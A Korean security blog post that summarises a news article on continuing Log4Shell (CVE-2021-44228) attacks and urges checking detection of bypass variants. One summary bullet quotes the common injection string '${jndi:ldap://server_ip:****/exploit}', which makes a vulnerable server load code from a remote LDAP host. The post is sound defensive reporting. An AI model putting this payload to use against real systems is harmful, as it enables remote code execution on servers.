상세 컨텐츠

본문 제목

[220505] 로그4셸 공격 건수 분석해보니... Log4j 취약점 공격은 현재진행형!

IT 보안/보안최신동향

by 밍구21 2022. 5. 8. 22:06

본문

🔽기사 전문

http://www.boannews.com/media/view.asp?idx=106569

 

로그4셸 공격 건수 분석해보니... Log4j 취약점 공격은 현재진행형!

지난해 발견돼 역대 최악의 취약점으로 불리는 Log4j 취약점, 일명 로그4셸을 악용한 사이버공격이 지속적으로 포착돼 이용자들의 각별한 주의가 필요하다. Log4j는 JAVA를 기반으로 서버와 응용프

www.boannews.com

 

[요약]

  •  CVE-2021-44228인 Log4j 취약점. 발견된 12월에 최고점을 찍었지만 2월 8일 200여 건 발생 등 여전히 공격 존재
  • 공격에 주로 사용되는 코드는 ‘${jndi:ldap://server_ip:****/exploit}’, 우회를 위해 다양하게 변화됨
  • 공격 형태가 매우 다양하므로 우회 가능성을 인지하고 보안 장비가 제대로 공격을 탐지하는지 점검해야 함
저작자표시

'IT 보안 > 보안최신동향' 카테고리의 다른 글

[220503] 2021년 가장 많이 악용된 취약점 15개? 최악은 ‘로그4셸’과 ‘MS익스체인지’  (0) 2022.05.08
[220505] 국내 첫 심스와핑 사건 그 후, 유심 ‘기지국 정보’ 놓고 피해자 vs KT  (0) 2022.05.08
[220426] 러시아-우크라이나 전쟁 때문에 늘어난 디도스 공격, 1사분기에만 역대 최고  (0) 2022.05.01
[220429] 카카오톡 이용자보호조치 안내? 깜빡 속았다간 카카오 계정 탈취  (0) 2022.05.01
[220426] 북한 해커들, 새로운 멀웨어 활용하여 대북 매체 기자들 겨냥  (0) 2022.05.01

관련글 더보기

티스토리툴바